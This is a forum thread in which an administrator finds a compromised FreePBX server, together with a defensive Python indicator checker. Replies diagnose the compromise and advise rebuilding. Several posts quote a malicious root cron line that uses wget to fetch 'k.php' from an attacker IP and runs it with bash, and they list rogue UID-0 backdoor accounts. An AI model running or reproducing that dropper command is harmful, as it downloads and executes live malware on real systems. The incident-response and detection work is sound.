byrnejb
(James B. Byrne)
May 3, 2022, 4:04pm
1
I am doing some work relating to a new gateway router and perimeter firewall. While checking https connectivity from outside I happened to discover this using netstat:
# netstat -an | grep 80
tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 37.49.230.74:80 SYN_SENT
tcp 0 1 192.168.6.9:42522 37.49.230.74:80 SYN_SENT
tcp 0 1 192.168.6.9:42526 37.49.230.74:80 SYN_SENT
. . .
My question: What is freebsd doing connecting to that address?
Stewart1
(Stewart)
May 3, 2022, 4:10pm
2
That is malicious traffic specific to FreePBX – your machine has already been compromised.
Had your firewall not blocked it, the script would have retrieved more malicious code.
byrnejb
(James B. Byrne)
May 3, 2022, 4:20pm
3
So I see this:
root 24718 1 0 12:18 ? 00:00:00 /bin/sh -c wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Which is likely the compromise script running. How do I tell where it is running from?
byrnejb
(James B. Byrne)
May 3, 2022, 4:22pm
4
That is interesting. I see this in cron:
*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
Your system is compromised, as @Stewart1 already said. Your best bet is to wipe and start over. You can attempt to clean up, but you are assuming that you are smarter/more determined than the bad guys.
1 Like
Stewart1
(Stewart)
May 3, 2022, 4:25pm
6
This thread may be useful:
If you were impacted by the restapps security regression a week or two ago, it is possible you were hit with a php script that is currently labeled “k.php” If you want to see if you were compromised by this script, I’ve included some content below that you can check. I do not claim to have identified everything, but I’m hoping this might help someone.
Anyways, here are the places you can look.
crontab -e -u root → if this line exists, you’re compromised. DO NOT run this for testing.
*/1 * …
but I strongly agree with @adell4444 – start over.
1 Like
byrnejb
(James B. Byrne)
May 3, 2022, 4:26pm
7
Which of these are used by FreePBX?
root:x:0:0:root:/root:/bin/bash
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
Yes, I see the need to get this fixed with a scrub. But not in the middle of a workday.
sugarmaint, supports and supermaint are all known to have been maliciously added. Take a read through the thread that was attached.
1 Like
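A defender-side check for the indicators quoted in this thread (the root crontab line, the UID-0 accounts and the outbound SYN_SENT sockets), as an added example that is not part of any post here. The sample crontab, passwd and netstat text is constructed from the values quoted above, and the indicator list is only what the thread names, so a clean result from it does not prove a box is clean.

```python
# Indicators quoted earlier in this thread (not a complete list).
MALICIOUS_HOST = "37.49.230.74"
DROPPER_PATH = "/var/lib/asterisk/bin/devnull2"
ROGUE_ACCOUNTS = {"sugarmaint", "supports", "supermaint"}


def check_crontab(crontab_text):
    """Return non-comment crontab lines that fetch from the host or run the dropper."""
    return [line.strip() for line in crontab_text.splitlines()
            if not line.lstrip().startswith("#")
            and (MALICIOUS_HOST in line or DROPPER_PATH in line)]

def check_passwd(passwd_text):
    """Return UID-0 accounts other than root, plus any name the thread lists as added."""
    suspicious = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7:          # skip blank or malformed lines
            continue
        name, uid = fields[0], fields[2]
        if (uid == "0" and name != "root") or name in ROGUE_ACCOUNTS:
            suspicious.append(name)
    return suspicious

def check_netstat(netstat_text):
    """Return (local, remote, state) for TCP sockets whose peer is the malicious host."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) >= 6 and parts[0].startswith("tcp") \
                and parts[4].startswith(MALICIOUS_HOST + ":"):
            found.append((parts[3], parts[4], parts[5]))
    return found

# Constructed sample input mirroring the output quoted in the thread.
SAMPLE_CRONTAB = """# m h dom mon dow command
*/1 * * * * wget http://37.49.230.74/k.php -O /var/lib/asterisk/bin/devnull2;bash /var/lib/asterisk/bin/devnull2
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:995:992::/var/lib/asterisk:/sbin/nologin
sugarmaint:x:0:0::/home/sugarmaint:/bin/bash
supports:x:0:0::/home/supports:/bin/bash
supermaint:x:0:0::/home/supermaint:/bin/bash
"""
SAMPLE_NETSTAT = """tcp 0 0 192.168.6.9:41780 0.0.0.0:* LISTEN
tcp 0 1 192.168.6.9:42528 37.49.230.74:80 SYN_SENT
tcp 0 1 192.168.6.9:42522 37.49.230.74:80 SYN_SENT
"""
```

On a live system feed it `crontab -l -u root`, `/etc/passwd` and `netstat -an` output instead of the samples; any hit means the wipe-and-rebuild advice above applies.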
system
(system)
Closed
June 2, 2022, 5:03pm
9
This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.